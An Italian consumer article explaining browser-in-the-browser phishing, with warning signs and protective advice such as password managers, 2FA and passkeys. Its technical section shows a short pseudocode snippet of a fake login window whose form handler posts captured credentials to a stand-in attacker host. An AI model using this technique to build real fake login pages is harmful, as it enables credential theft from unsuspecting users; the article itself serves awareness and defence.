Attacco browser-in-the-browser: cos’è e come riconoscere finestre di login false

L’attacco browser-in-the-browser (BitB) è una forma avanzata di phishing che crea finte finestre di login identiche a quelle di servizi come Google, Microsoft o Facebook, rubando le tue credenziali senza che tu te ne accorga. Per proteggerti subito, usa un gestore di password: se non riempie automaticamente i campi, chiudi la pagina e verifica l’URL reale. Questa tecnica, nata da un’idea teorica nel 2022, è ora usata dai truffatori reali per ingannare gli utenti con siti apparentemente legittimi.

In questo articolo esploreremo come funziona questo attacco subdolo, esempi concreti come il furto di credenziali Facebook e consigli pratici per evitarlo. La soluzione rapida? Abilita sempre la 2FA e non cliccare su link sospetti da email o siti sconosciuti.

Cos’è un attacco browser-in-the-browser?

Immagina di navigare su un sito che sembra offrire un’opportunità interessante, come un lavoro o un prodotto in sconto. Per procedere, devi accedere con il tuo account Google o Microsoft. Clicchi sul pulsante e appare una finestra di login familiare: logo perfetto, campi per email e password, persino la barra degli indirizzi che mostra un URL legittimo come www.facebook.com. Inserisci i dati e… le tue credenziali finiscono direttamente nelle mani dei cybercriminali.

Non è un pop-up vero del browser, ma un’illusione creata con HTML, CSS e JavaScript. Questi strumenti di sviluppo web moderni permettono di simulare interfacce complesse, inclusi elementi dinamici come animazioni e barre degli indirizzi finte. L’attacco sfrutta il Single Sign-On (SSO), il sistema che ti permette di usare un account per più siti, rendendo la truffa quasi invisibile anche a un occhio attento.

Originariamente concepito come esperimento da un ricercatore di sicurezza, oggi i malviventi lo impiegano in campagne reali, distribuendolo tramite email allarmanti o siti clone.

Come i truffatori distribuiscono l’attacco

I cybercriminali iniziano creando un sito fraudolento che imita uno legittimo, magari con un dominio simile (typosquatting) o contenuti accattivanti. L’utente viene attirato da email che simulano avvisi urgenti, come violazioni di copyright su Facebook.

Esempio reale: ricevi un’email da un finto studio legale che ti accusa di aver violato il copyright con un post. Clicchi sul link e atterri su una pagina con un CAPTCHA falso di Meta. Superato quello, appare la finestra di login BitB per Facebook. La barra degli indirizzi mostra www.facebook.com, ma è tutta un’illusione: i dati vanno ai server dei truffatori.

Questa sequenza abbassa le difese: prima l’allarme, poi il CAPTCHA per simulare legittimità, infine il furto. Simile per altri servizi come Apple o Microsoft, dove il pop-up sembra aprirsi sovrapposto al sito principale.

Segnali d’allarme per individuare una finestra falsa

Anche se perfetta visivamente, ci sono modi per smascherarla:

Controlla con un gestore di password: se non propone di autocompletare, l’URL è falso. I gestori verificano il dominio reale, non l’apparenza.
Verifica l’URL effettivo: premi F12 (dev tools) o controlla la finestra del browser padre.
Osserva comportamenti strani: la finestra non si chiude correttamente o manca di elementi come il pulsante di chiusura standard.
Evita link da email non attese: vai sempre direttamente al sito ufficiale digitando l’URL.

Questi controlli rapidi ti salvano da perdite di dati sensibili.

Come proteggerti in modo efficace

Per rendere i tuoi account inattaccabili:

Abilita l’autenticazione a due fattori (2FA): preferisci app dedicate come Google Authenticator per codici monouso, non SMS.
Usa passkey: chiavi crittografiche che non si possono rubare via phishing e indicano siti legittimi.
Password uniche e complesse: genera con un gestore come Kaspersky Password Manager, che sincronizza tutto sui dispositivi.
Antivirus con protezione web: blocca siti sospetti in tempo reale.

Applicando questi, riduci drasticamente i rischi anche se clicchi un link sbagliato.

Approfondimento tecnico: analisi dell’attacco BitB

Meccanismi di implementazione

L’attacco si basa su iframe sovrapposti e canvas HTML5 per simulare una finestra browser. Ecco i passaggi tecnici:

Creazione del sito host: i malviventi registrano un dominio confondibile (es. faceb00k.com) e clonano layout di siti popolari.
Simulazione SSO: pulsanti come “Accedi con Google” triggerano JavaScript che genera un div modale stilizzato come pop-up.
Falsa barra degli indirizzi: usano CSS per disegnare una barra con URL legittimo, completa di lucchetto HTTPS falso. Passando il mouse su link, JavaScript intercetta e mostra tooltip corretti.
Raccolta dati: il form submit invia POST a server controllati dai truffatori, non al servizio reale.

Codice esemplificativo (pseudocodice):

<div class="fake-browser">
  <div class="fake-addressbar">https://www.facebook.com/</div>
  <iframe src="fake-login.html" style="border:none;"></iframe>
</div>
<script>
  document.querySelector('form').addEventListener('submit', function(e) {
    e.preventDefault();
    fetch('https://attacker-server.com/steal', {method: 'POST', body: formData});
  });
</script>

Differenze con altri phishing

Tecnica	Descrizione	Rilevabilità
Phishing classico	Sito clone con URL sbagliato	Alta (URL visibile)
BitB	Finestra interna con URL finto	Bassa (simula pop-up nativo)
Man-in-the-Browser	Malware nel browser	Media (richiede infezione)

BitB eccelle perché puro client-side, senza malware.